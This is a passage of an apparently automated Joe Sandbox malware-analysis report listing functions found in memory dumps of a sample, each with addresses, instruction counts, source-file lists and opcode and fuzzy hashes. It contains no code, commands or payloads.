                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: vR-|
                                                                                                                                                                                                                                          • API String ID: 0-2041691514
                                                                                                                                                                                                                                          • Opcode ID: 0f8556e1b2e38565de3179f7ebdb25a0b0d8e84743707dc64c1f1fbe8c978d21
                                                                                                                                                                                                                                          • Instruction ID: cd96df1ad96c1e5083f2ae897d1a015a97edd381266b7ce8a03e01a31ab417c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f8556e1b2e38565de3179f7ebdb25a0b0d8e84743707dc64c1f1fbe8c978d21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5518AB3F1022547F3944978CC983A66693E790324F2F82788E9D6B7C6D97E9D0A5384
                                                                                                                                                                                                                                          Function 000DC465 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: AB@|
                                                                                                                                                                                                                                          • API String ID: 0-3627600888
                                                                                                                                                                                                                                          • Opcode ID: 3b5c607adf2533e946ce4c5a144aa0e86db452aad600ce134168deb016912a20
                                                                                                                                                                                                                                          • Instruction ID: a1d9336dd1635f3ad2e544984cc86c7f3a0a59c83def005fbc1af7b69d4e7706
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b5c607adf2533e946ce4c5a144aa0e86db452aad600ce134168deb016912a20
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D41E3711147928FD7228F39C860772FBE2BF97310B18969AC0D29B796C739E845CB61
                                                                                                                                                                                                                                          Function 000D8528 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: _^]\
                                                                                                                                                                                                                                          • API String ID: 0-3116432788
                                                                                                                                                                                                                                          • Opcode ID: fa0171e10e49699e689c813acbaadc3ccda4ef37a767e9893ec5b0e25f97e0f1
                                                                                                                                                                                                                                          • Instruction ID: fdbb7d7142447d4646770e7a233341574ffd645df6f407f693280e12ba1a9abf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa0171e10e49699e689c813acbaadc3ccda4ef37a767e9893ec5b0e25f97e0f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2521EAB460D3008BE76C8B34C891A3BB3E3FFC5314F28962DD253527A5CA35E8418B56
                                                                                                                                                                                                                                          Function 000F0340 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                          • Opcode ID: e574e57968c109a7bf96ee12a14de355ee585af50526cb4a8d3561735c2e6f83
                                                                                                                                                                                                                                          • Instruction ID: efd94bd0a29a5f88303ccc7ac5b2a223a074bbbc007a3093818421c06a5fcb5b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e574e57968c109a7bf96ee12a14de355ee585af50526cb4a8d3561735c2e6f83
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB3125B56083088BD714DF58D8C167FB7F4EBC5314F18892CE69883291D335D948DB52
                                                                                                                                                                                                                                          Function 000DE180 Relevance: .7, Instructions: 710COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7149bba3955d50d30207960359f1e55a1e6572df2d47128f56b6fa85de675808
                                                                                                                                                                                                                                          • Instruction ID: 68f5ddae4b163c1b0f99365e53c56f004ceb5d54dc040bd2798440aa42110cf2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7149bba3955d50d30207960359f1e55a1e6572df2d47128f56b6fa85de675808
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2362D2F1515B059FD3A0CF29C8817A3BBE9EB89310F54891ED2AEC7741CBB465019FA2
                                                                                                                                                                                                                                          Function 000B65F0 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 375eb13259bcdffda1a5a8a718bcfd0298ea838356da18cb8df44dbd9da8bc5b
                                                                                                                                                                                                                                          • Instruction ID: a78d169576bb1cac5908ee0d96aee19def920472f45ae17196f360eeb8615324
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 375eb13259bcdffda1a5a8a718bcfd0298ea838356da18cb8df44dbd9da8bc5b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF52C4B0908B848FEB75CF24C4843E7BBE1EB95314F14892DD5EB46682C77EA985CB11
                                                                                                                                                                                                                                          Function 000B73D0 Relevance: .6, Instructions: 625COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
                                                                                                                                                                                                                                          • Instruction ID: e92c2d56fb3acea9f0ff8e0e40483bd34be2d271d85bc5cb9bdf0170ebbf4c26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4522AF32A0C7118BD775DF18D8806EBB3E2FFC4315F198A2DD9CA97285D734A9158B82
                                                                                                                                                                                                                                          Function 001DE1BC Relevance: .5, Instructions: 519COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9772749536f387da24fd2a1154a61714cf072ad00ed28844b400a4d3d495b16a
                                                                                                                                                                                                                                          • Instruction ID: 690275df573594601c8ffd62b1fb2bed2f7e4fd9b5c5e191f7b3c3514122ba89
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9772749536f387da24fd2a1154a61714cf072ad00ed28844b400a4d3d495b16a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA02CFF3F112144BF3445E29DC983A67693EBE4320F2F823C9A98977C5E97E99094384
                                                                                                                                                                                                                                          Function 00134105 Relevance: .5, Instructions: 507COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7cbc3800a4bc929a2c6a847efdd507b7628b19e614dc32bd82d6735a74561916
                                                                                                                                                                                                                                          • Instruction ID: cfd1d84b104776e67e0c61e1ea3bab76f1d13e9aca5aed3d53477572d6ae0288
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cbc3800a4bc929a2c6a847efdd507b7628b19e614dc32bd82d6735a74561916
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F1BFF3F102250BF3944979CD993667682DBD4324F2F82389F88A77C5E87E9D0A4284
                                                                                                                                                                                                                                          Function 001F0203 Relevance: .5, Instructions: 490COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 934800221a83265224b059da54b73594b87763ba14f0ec461488a5f547a499c6
                                                                                                                                                                                                                                          • Instruction ID: 5bfd2de31372c8ffe60eedd0147e2388706ab7eb51f187c398355a154f3fd75a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 934800221a83265224b059da54b73594b87763ba14f0ec461488a5f547a499c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18F1FFB3F246254BF3504D29DC883AA7696DBD4320F2F863D9A989B7C4E93D9D058381
                                                                                                                                                                                                                                          Function 000EA5D4 Relevance: .4, Instructions: 432COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
